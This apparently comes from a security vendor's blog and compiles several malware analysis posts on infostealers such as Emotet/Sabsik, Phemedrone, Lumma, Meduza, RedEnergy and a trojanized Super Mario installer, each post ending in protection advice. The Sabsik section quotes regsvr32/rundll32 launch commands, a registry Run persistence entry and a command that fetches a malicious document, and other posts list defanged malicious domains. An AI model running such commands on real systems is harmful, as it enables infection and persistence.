What is Trojan:Script/Sabsik.fl.A!ml?

Trojan:Script/Sabsik.fl.A!ml is a trojan detected by Windows Defender. This detection particularly refers to stealer malware that is also capable of other activities, for instance – deploying other malware.

Typically, Sabsik Trojans are distributed through email spam. The email attachments contain a hidden script that triggers the malware to download and run when macros are activated. As a result, users who accidentally open these files download and run the virus without realizing it. Some Sabsik samples can self-distribute through vulnerabilities in the Windows network, such as EternalBlue.

Trojan Sabsik Threat Analysis

Probably, the best known malware sample that was detected as Trojan:Script/Sabsik.fl.A!ml is Emotet Trojan. Even though it now borders its extinction, the fact of this signature relation to this malware gives us an excellent clue on what you can expect when Sabsik is running in the system.

Launch and Detection Evasion

Emotet a.k.a Sabsik uses a variety of techniques to avoid detection by antivirus software and ensure it runs successfully on target systems. The malware typically employs deep packing, obfuscation and other detection evasion techniques, making it difficult for traditional antivirus solutions to detect its presence. When arranging its launch, this malware typically performs a trick known as DLL sideloading.

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll – to register the malware DLL.

C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServer – to launch the latter.

Modules

Emotet is modular malware, meaning it can extend its functionality by loading additional modules. Not all Sabsik samples posess modularity, but it becomes a more and more widespread feature in modern malware. Some of the common modules associated with this threat include:

• Stealer Module – used for stealing banking credentials and other sensitive information.
• Hardware Module – collects detailed information about the infected system.
• XMRig Module – utilized for cryptocurrency mining purposes.
• Advanced Email Stealer Module – steals email credentials and contact lists.
• SMB Lateral Movement Module – enables lateral movement within a network by exploiting SMB vulnerabilities.
• Traffic Proxying (UPnP) Module – facilitates the redirection of traffic to C2 servers through compromised servers.

Establishing Persistence & Data Stealing

After infecting the system, Sabsik creates a registry key in the infected system’s registry, ensuring that it is launched every time the system boots up. This persistence mechanism allows Sabsik to maintain a foothold on the infected system, even after reboots. Malware creates a DWORD key with the following contents in the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry hive:

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj

Data Collection & Other Functionality

Despite focusing on banking info, Emotet/Sabsik is capable of collecting various types of sensitive information from infected systems. This may include usernames, passwords, system information, and email credentials. Sabsik also possesses functionality for self-propagation through email spamming and lateral movement within networks, allowing it to rapidly spread and infect multiple systems.

Malware Delivery by Emotet

Despite originally being a banking stealer, Emotet is mostly known as dropper malware. In the prime days, vast networks controlled by Emotet were used to deploy various payloads to infected systems. Among them were ransomware, spyware, coin miners, and other types of malware. Emotet indiscriminately targets both individual users and organizations, spreading its malicious payloads according to the directives of its operators.

C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://brooklyn.blob.core.windows.net/pen-test/MaliciousDOC.doc

Trojan:Script/Sabsik.fl.A!ml – False Positive or Not?

In some cases, Sabsik Trojan may be mistakenly detected by antivirus software if you try to run a legitimate file such as a game, application, or a driver. This can happen due to an incorrect signature, incompatibility, corruption, or file change. According to several user reports, popular games downloaded from legitimate sources may sometimes be mistakenly flagged as Trojan:Script/Sabsik.fl.A!ml.

One particular example comes from a BattleNET user who purchased Diablo II Resurrected and was warned about the Sabsik Trojan when trying to launch the game. It’s not hard to guess that a game released by a company as big as Blizzard would not contain malware. If you are 100% sure that the source of your download is safe, the Sabsik Trojan notification could easily be a false positive.

It is also important to note the presence of “!ml” particle added to the detection name. This stands for the use of an AI detection system. While this method is highly effective, it can generate false positive detections without confirmation from other detection systems.

However, it is impossible to be 100% sure that the source of the downloads is safe. If after interacting with a shadow file of unknown origin you see a warning about the Sabsik Trojan program, you should definitely quarantine/remove the source of the threat.

How to remove Trojan:Script/Sabsik.fl.A!ml?

If Sabsik Trojan was detected in an untrusted file, you should definitely delete it. However, this is not enough to be sure of your security. We recommend performing a full system scan with a reliable anti-malware tool such as GridinSoft Anti-Malware. Last but not least, you may want to consider changing important passwords in case they are compromised, although this is unlikely to happen.

The post Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

Ov3r_Stealer Abuses Facebook Job Ads

Scammers use elaborate job ads posted on Facebook. These seem legitimate at first glance and target a wide range of job seekers with the promise of lucrative opportunities. As the experts at Trustwave clarify intruders use a PDF file that masquerades as a legitimate document hosted on OneDrive. Prospective victims are lured into clicking an “Access Document” button embedded within the PDF, which initiates a chain of malicious events.

The Ov3r_Stealer infection chain is a sophisticated cyber system designed to compromise systems and steal sensitive data. Being a rather classic infostealer, it primarily attracts attention due to the unusual way of propagation. It begins with deceptive tactics, ensuring persistence for data collection and stolen crypto. The infection chain is next:

1. Initial Access

To direct the victim to the surprise PDF, a fake Facebook account posing as Amazon CEO Andy Jassy is created with a link to OneDrive. After clicking “Access Document” from the Facebook page, a .url file is downloaded, which starts the second step.

2. Payload Downloading

After clicking on the Access Document button, the victim is taken to a .url file to download. It is masquerading as a legitimate ‘DocuSign’ document. The .url file directs to an IP address with a pdf2.cpl file inside the data2.zip archive on the remote host. Since this is a Windows Panel (.cpl) file, Windows allows this operation. Further, the final payload of this malware is also targeted at Windows-based systems.

3. Additional Loaders

At this stage, the malware may utilize additional loaders or components to further execute and propagate. The loaders are used to facilitate the installation and execution of the final payload, allowing the malware to function efficiently and effectively in the compromised environment.

4. Final Payload

There are three files that make up the final payload, and each loader stage brings them in: WerFaultSecure.exe, Wer.dll, Secure.pdf. Once executed, the malware will establish persistence to ensure it is always running and exfiltrate specific data to a monitored Telegram channel.

5. Gaining Persistence

To ensure its continued presence and operation within the compromised system, the malware establishes persistence mechanisms. This may involve modifying system settings, creating registry entries, or scheduling tasks to ensure that the malware remains active and operational even after system reboots or security scans.

6. System Surveillance & Data Collection

Once established within the compromised system, the malware begins collecting sensitive data and discovering valuable information. This stage may involve scanning the infected device for credentials, cryptocurrency wallets, and other valuable data, as well as identifying potential targets for further exploitation.

7. Data Exfiltration

The final stage of the malware operation involves exfiltrating stolen data from the compromised system to external servers or channels controlled by the attackers. This may include transmitting sensitive information such as credentials, financial data, or proprietary information to remote locations, enabling the attackers to harvest and exploit it for nefarious purposes.

Similarities with Phemedrone Stealer

Experts note that Ov3r_Stealer shares some similarities with another stealer malware called Phemedrone Stealer, which we covered recently. Both malware use the same GitHub repository (nateeintanan2527) and the same infection chain involving PDF files, URL files, CPL files, and PowerShell loaders. They also exploit the same Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025) to evade detection. There is actually one more malicious program that exploits the same SmartScreen Vulnerability, dubbed Mispadu – check out our report.

The only serious difference between the subject and a Phemedrone is that the latter is written in C#, while Ov3r_Stealer is written in C++. The report suggests that Phemedrone may have been re-purposed and renamed to Ov3r_Stealer by the same or different threat actors. Either way, such similarities are rarely a coincidence in the malware world.

How to Protect Against Malware in Ads?

Malware that spreads through advertisements is nothing new, thus the recommendations and effective counteraction measures are well elaborated. As major ad providers struggle (or are unwilling) to filter malicious ads, the best option is to avoid interacting with them at all. If the thing from the banner attracted your attention, it is better to go check it by yourself. Benign advertisers always mention their website either on the banner or in the description, so you won’t get lost there.

A more reactive though more reliable and relaxed approach is using advanced anti-malware software. Stealer malware rely on stealthiness, but they can barely disguise their malignant activity – and here is where heuristic detection shines. With its advanced Proactive Protection mode, GridinSoft Anti-Malware will be able to prevent malware infections at their very beginning.

The post Ov3r_Stealer Steals Crypto and Credentials, Exploits Facebook Job Ads appeared first on Gridinsoft Blog.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting the CVE-2023-36025 vulnerability in Microsoft Windows Defender SmartScreen. This campaign involves the Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with cloud-hosted malicious URL files, often disguised using URL shorteners. Upon execution, these files exploit CVE-2023-36025 to initiate the malware download.

The campaign itself is concentrated on social media. Hackers spread URL files, that look as an innocent link shortcut. Clicking it initiates a call to the GitHub repo, that returns the shellcode needed to download and run the payload. While it is not new to see the frauds targeting such places, the use of URL files is what defines the efficiency of the trick. They essentially act as a lockpick to user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability that affects Microsoft Windows Defender SmartScreen. It allows attackers to bypass security warnings and checks by manipulating Internet Shortcut (.url) files. Despite Microsoft’s patch released on November 14, 2023, cybercriminals have actively exploited the vulnerability, leading to its inclusion in the Cybersecurity and Infrastructure Security Agency’s (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, frauds use advanced evasion tactics by utilizing a control panel item (.cpl) file to bypass Windows Defender SmartScreen. By default, it should send you a warning once you the URL shortcut. But the usage of specifically crafted file variant circumvents the protection and executes malicious downloads in the background. Further on the line, a couple of other known Windows weaknesses are exploited, particularly the Windows Control Panel binary.

Detailed Analysis

Attackers spread Phemedrone Stealer malware using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files. They evade Windows Defender SmartScreen using a .cpl file and the MITRE ATT&CK technique T1218.002. The malware executes a DLL loader that calls Windows PowerShell to download a loader from GitHub. The second-stage loader, Donut, can execute various types of files in memory and targets multiple applications and services to steal sensitive information.

The malware collects system information and compresses it into a ZIP file using MemoryStream and ZipStorage classes. It then validates the Telegram API token and sends the attacker the compressed data via the SendMessage and SendZip methods. The SendZip method uses an HTTP POST request to compress the data into a document and send it to the Telegram API.

Mitigation and Recommendations

In light of this threat, when attackers find vulnerabilities faster than developers fix them, we have a few recommendations in that regard:

• Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
• Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
• Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.



• Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.

The post Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer appeared first on Gridinsoft Blog.

YouTube Videos Promoting Malware

Concerning a development in the cybersecurity world, researchers have identified a new threat targeting freeloaders via YouTube videos. These videos are seemingly harmless and offer cracked versions of popular software. But as it turns out, these videos distribute a potent malware known as Lumma Stealer.

Besides being published some time ago, the video keeps gaining popularity. As researchers say, the file offered on the video as a cracked program is getting updated, meaning that hackers could have started spreading malicious payloads only after the video became popular. Also, such an approach opens the ability to spread effectively any malware, with Lumma being a firstling.

The Attack Chain

The attack begins innocently, with users searching for cracked versions of popular software like Vegas Pro. A link in the video description tempts the user, leading to a bogus installer hosted on a service like MediaFire. But the real danger lies within. The unpacked ZIP installer contains a Windows shortcut masquerading as a setup file.

In fact, the “setup” is a .lnk file that runs a PowerShell script. Then, things happen as in the textbook: the script downloads and runs the payload from a GitHub repository. The latter is chosen as a source for malware with firewall circumvention in mind.

What is Lumma Stealer?

Lumma Stealer is an information-stealing malware written in C language. It has been available on Russian-speaking forums since August 2022 through a Malware-as-a-Service (MaaS) model. The threat actor behind this malware is believed to be “Shamel”, who operates under the alias “Lumma”. The primary targets of Lumma Stealer are cryptocurrency wallets and two-factor authentication (2FA) browser extensions.

Once the malware infiltrates the victim’s machine, it steals sensitive information. It exfiltrates it to a C2 server via HTTP POST requests using the user agent “TeslaBrowser/5.5”. Along with these features, the malware also has a non-resident loader capable of delivering additional payloads through EXE, DLL, and PowerShell.

The Lumma Stealer has a starting price of $250 per month on underground forums. The lowest plan allows users to view and upload logs and access log analysis tools. On the other hand, the most expensive plan costs US$20,000 and gives users access to the source code. It also grants them the right to sell the infostealer.

How to stay protected?

First, we recommend that you refrain from downloading and using pirated software. This applies both to downloading from torrents and other sources. It is illegal for both home users and especially corporations and the risks – well, you may see them above. Still, you can enhance your protection against malware like Lumma Stealer by following tips:

• Avoid shady software spreading websites. Regardless of what kind of software they spread, the chance of getting infected by using one is noticeably higher. Seek a more reliable source – it will save you both time and money. To verify whether the site is legit and trustworthy, consider using GridinSoft Free Online Virus Checker.
• Don’t click on suspicious links. Similarly to the previous advice, be cautious with links, especially in emails, social media messages, or websites. Cybercriminals often rely on human curiosity to spread malware.
• Use anti-malware protection. A reliable anti-malware program and ensure it’s always up-to-date. It can detect threats before they harm your system. GridinSoft Anti-Malware is a security solution you can rely on.

The post YouTube Videos Promote Software Cracks With Lumma Stealer appeared first on Gridinsoft Blog.

Rude Stealer Overview

In early November 2023, researchers identified a malicious JAR file labeled “Stealer.jar” on VirusTotal. Further analysis revealed that this file is an information stealer named Rude. Unlike a more common form of executable files, this malware is Java-based and designed to target the Windows Operating System. JAR files can be stealthier and evade detection from conventional security software.

The primary target of Rude Stealer is tokens and IDs from popular applications like Discord and Steam. Additionally, it collects a plethora of sensitive information. Among them are passwords, cookies, browsing history, and auto-fill data from various browsers. Remarkably, this malware ignores cryptocurrency wallets, which have become a typical point of interest since 2020. The stealer is also equipped with the ability to capture screenshots, adding an extra layer to its information-gathering capabilities.

Initial Infection and Technical Analysis

While the initial infection vector remains unknown, it’s clear that Rude Stealer requires manual activation by TAs through command-line arguments. By specifying their Telegram channel chat ID and Bot Token, TAs initiate the stealer to commence its data theft activities. A detailed technical analysis reveals the workings of Rude Stealer, with specific class files dedicated to various operations.

Stealing Steam User Data

First of all, Rude Stealer meticulously scans the victim’s system for the Steam application directory, copies relevant files, and extracts SteamIDs. These IDs are then used to generate URLs leading to the Steam community profiles of the victims. Building on the acquired Steam user data, the stealer delves into the installed games, retrieving game names and logging this information in a designated text file.

Extracting Discord Tokens And Browser Data

Next, the stealer locates Discord-related directories, copies pertinent files, and extracts Discord tokens using regex patterns. It saves these tokens in a separate text file. Besides Discord, this stealer collects sensitive information from the following browsers: Brave, Edge, Chrome, Firefox, Opera, OperaGX, Vivaldi, and Yandex. The extracted information from different web browser databases is saved in log files. It includes:

• Autofill
• Credit card data
• Cookies
• History
• Passwords

Capturing System Information

During the next step, the Rude Stealer gathers a list of active processes on the compromised system. The details it records include process names and IDs. Apart from gaming platforms, Rude Stealer also retrieves a wide range of system-related information. Nothing unusual here – it gathers IP address, country, CPU architecture, and RAM amount. All of this data is saved in a text file. Additionally, this stealer can capture screenshots using the Java Robot class, which are then saved in the user profile directory.

Data Transmission and Cleanup

Once all the necessary information is collected, Rude Stealer compiles it into a ZIP archive and assigns the archive’s label with the computer’s name. The archive is subsequently sent to the TAs’ Telegram channel through the Telegram bot API. The stealer finishes its operation by performing a so-called meltdown, removing files and directories linked to its presence.

Based on the evidence found during the analysis, researchers inferred that Rude Stealer is probably being operated by a TA associated with or operating from Turkey. This assumption is supported by the fact that the stealer gathers the time of the compromised system and converts it to Turkey’s time zone.

Recommendations

Despite being a simple Java-based stealer, Rude Stealer is still a significant threat to individuals and organizations. Its use of Dxdiag to gain sensitive information is particularly troubling.

• Disable the automatic password-saving in the browser. This is an essential step because stealers often target web browser data. Instead, you can use a password manager to manage and store your passwords securely.
• Establish stringent access controls for system tools. Since Rude Stealer can abuse dxdiag to execute its malicious code, implement stricter access controls for these tools. You can do this by restricting which users can run these tools or using application allowlisting.
• Block the creation of text files in sensitive user profile folders. Rude Stealer often creates text files in sensitive user profile folders to store stolen data. To prevent this, enforce strict rules that block the creation of text files in these folders, particularly in paths like “C:\Users\[username]”. You can use file system permissions or security software to achieve this.
• Use an anti-malware solution. Maintaining up-to-date anti-malware and internet security software is crucial for protecting against malware. These tools can detect and block malicious code from executing on your devices.

The post Rude Stealer Targets Data from Gamer Platforms appeared first on Gridinsoft Blog.

CPU-Z Malware in the WindowsReport Page Clone

Recently, a wave of malicious ads on Google Search results page offered users a Trojan-infected version of the popular CPU-Z program. For better disguise, the malware was hosted on a clone site of the real news site WindowsReport. As the presence of the official site for the product is not that obvious for users, such a trick was quite effective.

By clicking on such an advertisement, the victim goes through a series of redirects that fooled Google’s security scanners and filtered out crawlers, VPNs, bots, etc., redirecting them to a special decoy site that did not contain anything malicious.

Users ended up on a fake news site hosted on one of the following domains:

• argenferia[.]com;
• realvnc[.]pro;
• corporatecomf[.]online;
• cilrix-corp[.]pro;
• thecoopmodel[.]com;
• winscp-apps[.]online;
• wireshark-app[.]online;
• cilrix-corporate[.]online;
• workspace-app[.]online.

The result of these manipulations is the chain attack, initiated with FakeBat malware. Further, this loader injects well-known RedLine infostealer – an old-timer of the scene.

What is RedLine Infostealer?

Downloading the CPU-Z installer from the attackers’ resource resulted in the download of an MSI file containing a malicious PowerShell script, which the researchers identified as the FakeBat malware loader (aka EugenLoader). This downloader extracted the Redline payload from a remote URL and launched it on the victim’s computer.

Redline is a powerful data theft tool that can steal passwords, session tokens, cookies, and vast amounts of other stuff. We have a dedicated article with the complete tech analysis of this malware – consider checking it out.

Earlier, we wrote about how cybercriminals distribute RedLine infostealer. It uses sites for downloading the fake MSI Afterburner utility. To distribute it, various domains were also used as part of the hacker campaign, which could be mistaken by users for the official MSI website. The imitation of brand resources was done quite well.

According to Google representatives, all malicious ads associated with the hacker campaign to distribute the infected CPU-Z tool have now been removed, and appropriate action has been taken against the accounts associated with them.

This is not the first time that hackers have used Google Ads

This exact malvertising campaign was discovered by analysts, who believe it is part of a previously observed campaign of a similar purpose. Previously, the attackers used fake Notepad++ advertisements to deliver the malware.

In the ads, the attackers promoted URLs that were clearly not associated with Notepad++, and used misleading titles in their ads. Since headers are much larger and visible than URLs, many people likely didn’t notice the catch.

Let me remind you that we talked about how malware operators and other hackers are increasingly using Google Ads to distribute malware to users who are looking for popular software. So, you can encounter malicious ads when searching for Slack, Grammarly, Dashlane, Audacity, and dozens of other programs.

The post Malicious CPU-Z Copy Is Spread In Google Search Ads appeared first on Gridinsoft Blog.

What is Meduza Stealer?

Meduza is an all-encompassing infostealer, which is somewhat similar to the old guard at a glance. However, well-known things such as Redline or Raccoon stealers gained the ability to steal cryptocurrency information only with further updates. Meduza, on the other hand, can do this out-of-box, with the ability to circumvent more tricky protection measures of crypto apps. Moreover, it includes a much bigger list of wallets and browsers it can extract data from than any of the mentioned stealers.

The distinctive feature of Meduza Stealer is the way it hides its samples. Instead of a usual packing, hackers use code obfuscation and recompiling, which allows them to circumvent even the most robust anti-malware engines. Well, these approaches do not sound like something phenomenal, but when applied together, and in an unusual way, things may become way less predictable – and detectable.

Though, this is not the full list of unusual things for this malware. In price, the malware offers 2 fixed plans and a negotiable lifetime license. For $199 you receive malware, all possible customization options for the payload, admin panel, and the ability to download all the logs in one click, for the term of 1 month. Hackers offer the same stuff for $399 for 3 months. And the cherry topping, as I said, is the ability to negotiate the prices of a lifetime license for this malware. Probably, malware developers are even ready to share the source code – but that is only a guess since there were groups that used such a model earlier.

An Offspring of Aurora Stealer?

There are plenty of examples of how brand-new malware may be a re-branded old sample, with a slightly different team of crooks behind it. Malware is rarely developed by a single person. Developers of one malware may start working on another, and bring their prior developments in a new product. Alternatively, a part of a cybercrime gang that stopped functioning may decide to resume their illegal deeds – and they rebrand their “tools” to start with a new image. This or another way, is a common occasion there.

In the case of Meduza Stealer, things are not that straightforward. Due to the use of enhanced obfuscation, it is hard to say whether it shares any code details with known malware families. Some malware analysts claim that Meduza is an offspring of Aurora Stealer – malware that popped out in late 2022. Their main arguments are similarity in the form of C2 calls and logs with collected data.

As you can see, Meduza’s logs resemble Aurora’s by the ASCII-styled header and some visual elements. However, it is not a definitive thing – malware developers sometimes inspire with or completely copy things from other malware families. Other details that researchers put under the suspect are file naming policies – but this is not the brightest proof as well.

This, however, caused a harsh reaction from malware developers. In their “support” channel they called all the proofs rubbish, and also said they picked up the trail of one who leaked the malware build. Also, there was decent evidence that proves Meduza’s originality – it is written in C++, which is not even close to the Golang used in Aurora Stealer.

Meduza Stealer Analysis: Catch Me or I Catch You

The threat that comes from each specific malware sample roughly depends on two factors: how hard it is to detect it and how much damage it can deal. Meduza Stealer tries to outpace its counterparts in these two factors. It is not the most stealthy malware, for sure, and there are ones that steal even more data, but rare samples may boast of a combination of these two. And Meduza does.

In the picture above you can see the simplified scheme of the Meduza Stealer operation process. First of all, it checks the geolocation of the attacked system by its IP address. There lies another unusual feature of this malware — it has a typical ban list of countries for malware from Russia, though it does not include Ukraine. Instead, malware will exit once the IP of the attacked system is in Georgia. The latter has become quite a popular destination among Russians who try to avoid enlistment in the army. Overall, malware will not run in Armenia, Belarus, Georgia, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan and Turkmenistan.

The very next step is contacting the C2 server. This step is not very common among stealers, as they prefer to knock back the C2 only after succeeding with data stealing. Instead, Meduza contacts the server immediately after ensuring that the system is not in the forbidden location – but without any strict actions. Malware sends the blank POST request, that does not receive any response from the server. Only once the connection is successful, malware will keep going.

Data Gathering

As I said, Meduza is distinctive for an outrageously wide number of web browsers, desktop apps, and crypto-wallets it can rummage through. More common malware samples usually stop on the most popular apps and wallets, including some from alternative options. This one, however, does not disdain even underdogs. Kinza, Mail.ru, Atom, Amigo – some of them are even considered PUPs by security vendors, and I bet you didn’t even know that some of them exist.

List of browsers Meduza gathers data from:

Browsers commonly have different ways to handle passwords and autofill info – and the malware has its approach for each one. For ones that store such data in databases, malware prepares an SQL database request, which simply extracts all the valuables. Other, less secure browsers, keep this info in a plain text file – which is not a big quest to find.

One more point of interest for stealer malware in web browsers is cookie files. Cookies can contain different things – from almost useless shopping cart contents to session tokens, usernames, emails, and the like. Cookie files can have a great value when it comes to data stealing – especially when they are fresh. One may say – just the like real ones.

Desktop apps

Aside from web browsers, Meduza Stealer gathers information from several desktop applications, namely Telegram, Steam, and different Discord clients. To put its hands on Steam session tokens, malware gets to the program’s registry key in the CurrentUser branch. The HKCU\Software\Valve\Steam key contains a lot of info, aside from login data and session information – so malware does not go purely for the account.

Telegram does not keep login details in such an accessible form, though malware manages to gather sensitive information similarly. By checking these two keys, Meduza can get information about the system kept in Telegram session info, app versions, usernames, and other important stuff.

Discord is also a tough nut when it comes to grabbing session info. For that reason, malware limits to only system info recorded in a session, app configurations, and the like. This, contrary to two other apps, is done directly in the programs’ folder. Malware attacks several different editions of Discord, as the free API allows the creating of forks and user modifications.

2FA Extensions

Well, did I say that Meduza is ravenous when it comes to data gathering? Hold your 2FA browser extensions close to your body – the malware hunts them as well. The list of add-ons it targets is not as big as that of browsers, though there are not many of them present.

Cryptocurrency wallets

Gathering data about crypto wallets was not a widespread thing among older-gen stealers. With time, most of the families we know and love adopted such functionality. Modern-gen ones have them present by default, and it probably makes up for the number of names they can gather info from.

This extensive list contains crypto wallets that can have both desktop and in-browser forms. In such cases, malware treats them in a separate way – by collecting data from registry entries they leave. Here are some examples of keys the malware can read to collect login data from your crypto wallet:

System fingerprinting

To distinguish between the attacked systems, stealers commonly collect some trivial info about the system. Meduza is not an exclusion – it collects all the basic things that can identify the computer among others.

Another application for such data comes into view when we remember that Meduza can also collect browser cookies. The combination of cookies, passwords, and system information allows for creating a complete copy of the device – at least from the POV of the website. There even were Darknet services dedicated specifically to the system profile spoofing – you input the cookies and system specs, and it makes your system indistinguishable from the original one. This helps with circumventing the most sophisticated protection mechanisms.

Data extraction

All the data Meduza Stealer manages to collect from the infected system is stored in a specific folder, created after the malware unpacking and execution. When it comes to sending the data to the command server, malware archives this data and sends it to the server – nothing unusual there. Since malware uses a protected connection for the C&C communication, it is not that easy to detect the extraction process.

Contrary to the “classic” stealers, like Vidar, Meduza does not perform the meltdown once it finishes data collection. It keeps running in the background, performing periodic pings to the C2 and waiting for commands. There is a command for self-removal – but they are most likely sent only in exclusive cases.

How to protect against Meduza Stealer?

Actually, the ways to protect against Meduza are the same as in the case of any other stealers. However, there is a difference dictated by the exceptional detection evasion capabilities of this malware. For efficient prevention of Meduza stealer activity, a strong heuristic protection is essential.

Be careful with all things that can act as a malware source. Email spam or phishing posts in social media are among the most exploited ways of malware spreading. A less popular, but sometimes even more efficient approach is exploiting Google Ads in search results. Fraudsters will do their best to make you believe that the thing is legit, and you should not fear interacting with it.

Implement preventive anti-malware measures. To weed out malware with such an unusual detection evasion model the program should include a sturdy heuristic engine. Additionally, you can seek solutions with email protection functions and CDR applications. They help you to secure one of the possible attack vectors.

Avoid cracked software. Yet another place used for malware spreading is cracked programs – they have served this purpose for over two decades now. And even since its share shrunk in recent years, you can still get something nasty from there. You can get dropper malware through the program crack, and it will then inject any other thing – from spyware to ransomware.

The post Meduza Stealer: What Is It & How Does It Work? appeared first on Gridinsoft Blog.

A malware called RedEnergy stealer uses a sneaky tactic to steal sensitive data from different web browsers. Its fundamental spreading way circulates fake updates – pop-ups and banners that bait the user to install what appears to be the malicious payload. RedEnergy also has multiple modules that can carry out ransomware activities. Despite using common method names, the malware has kept its original name. RedEnergy is classified as Stealer-as-a-Ransomware because it can function as a stealer and ransomware.

What is RedEnergy Malware?

RedEnergy is a malware designed to appear as a legitimate browser update, tricking users into downloading and installing it. It imitates well-known browsers like Google Chrome, Microsoft Edge, Firefox, and Opera, and once triggered, it deposits four files (two temporary files and two executables) onto the targeted system. One of these files contains a malicious payload and initiates a background process. The load displays an insulting message to the victim once executed.

Also, RedEnergy is malicious software that remains on an infected system even after restart or shutdown. This allows it to continue its harmful activities uninterrupted. As part of its operation, it also encrypts the victim’s data and adds the “.FACKOFF!” extension to all the encrypted files. It then demands payment from the victim to restore access to the files through a ransom message (“read_it.txt“) and changes the desktop wallpaper.

One of the things that the ransomware does is delete data from the shadow drive, which means that any backups are erased. In addition, the malicious software changes the desktop.ini file, which contains basic settings for file system folders. By doing this, RedEnergy can alter the appearance of the folders, making it easier to hide its activities on the system. Lastly, RedEnergy can also steal data from different web browsers, potentially giving it access to personal information, login details, financial data, online activities, session-related information, and other essential data.

Threat Summary

How does RedEnergy Malware work?

This threat campaign uses a deceitful redirection technique to trick users. When users try to access the targeted company’s website through their LinkedIn profile, they are unknowingly sent to a malicious website. On this website, they are asked to download what seems like a legitimate browser update, presented as four different browser icons. However, this is a trap, and the unsuspecting user downloads an executable file called RedStealer instead of an actual update.

A deceptive threat campaign uses a misleading download domain called www[.]igrejaatos2[.]org. The domain appears as a ChatGpt site, but it’s counterfeit and aims to trick victims into downloading a fake offline version of ChatGpt. Unfortunately, the zip file contains the same malicious executable as before, and victims unknowingly acquire it upon downloading.

How to avoid installation of RedEnergy Malware?

Individuals and organizations must exercise extreme caution when accessing websites, particularly those linked to LinkedIn profiles. Verifying browser updates’ authenticity and being wary of unexpected file downloads are paramount to protecting against such malicious campaigns.

To prevent negative consequences, there are several essential steps to take:

• Updating your operating system and software regularly.
• Essential to be cautious when dealing with email attachments or suspicious links, especially from unknown sources.
• Consider using reliable antivirus or anti-malware software to provide extra protection and conduct regular system scans.
• Avoid downloading files from untrusted websites and be wary of pop-up ads or misleading download buttons that may contain harmful content.

The post RedEnergy Stealer-as-a-Ransomware On The Rise appeared first on Gridinsoft Blog.

Trojans Hide in the Super Mario Game

Criminals can monetize malware distributed through the game. Installers engage in activities such as stealing sensitive information, launching ransomware attacks, and other malicious actions. Previously, researchers have discovered several malware campaigns targeting gamers and their game-related applications, including Enlisted, MSI Afterburner, and others.

The experts found a compromised version of the Super Mario Bros game installer that contains various harmful components. It is an XMR miner, SupremeBot mining client, and open-source Umbral stealer. These malicious files were found packaged with the legitimate installer file of super-mario-forever-v702e. This incident highlights another reason TAs utilize game installers as a delivery mechanism: the powerful hardware commonly associated with gaming provides valuable computing power for mining cryptocurrencies.

Here is the infection chain of the compromised Super Mario Game installer:

What is the Umbral Stealer virus?

Umbral Stealer is a dangerous malware that can capture sensitive user information by taking screenshots of the Windows desktop or using connected webcams to record media. The stolen data is saved locally and then sent to the C2 server. To avoid being detected by Windows Defender, the malware turns off the program unless tamper protection is enabled. If tamper protection is enabled, the malware adds its process to the Defender’s exclusion list. The malware also interferes with popular antivirus products‘ communication with company sites by modifying the Windows host’s file, rendering them ineffective.

Umbral Stealer is a C# information stealer that has been open-source and available on GitHub since April 2023. This Stealer steals various types of data from infected Windows devices, such as stored passwords and session tokens in web browsers, cryptocurrency wallets, and authentication tokens for popular platforms like Discord, Minecraft, Roblox, and Telegram.

How to protect against Trojanized Super Mario?

If you recently installed Super Mario 3: Mario Forever, it’s recommended to follow the next steps to ensure your PC safety:

• Users need to monitor their system performance and CPU usage regularly.
• Installing a reputable antivirus and internet security software package on all connected devices, including PCs, laptops, and mobile devices, is highly recommended.
• Scan your PC for any malware and remove it if detected.
• To ensure your safety, reset your passwords for sensitive accounts such as banking, financial, cryptocurrency, and email.
• Use a unique password for each account and store it in a password manager for added security.
• When downloading games or any software, only from official sources like the publisher’s website or trustworthy digital content distribution platforms.
• Always scan any downloaded executables with your antivirus software before launching them and ensure that your security tools are up-to-date.

The gaming community’s large and interlinked user base is a prime target for malicious activities by TAs. One such activity is a coin-miner malware campaign that uses the Super Mario Forever game to target gamers using high-performance computers. This malware also has a component that steals sensitive information from the victims’ systems, resulting in financial losses and a significant decrease in system performance and resources. As a result, individuals and organizations face significant disruptions in their productivity.

The post Super Mario Malware: Hackers Spread Stealers in the Fake Game appeared first on Gridinsoft Blog.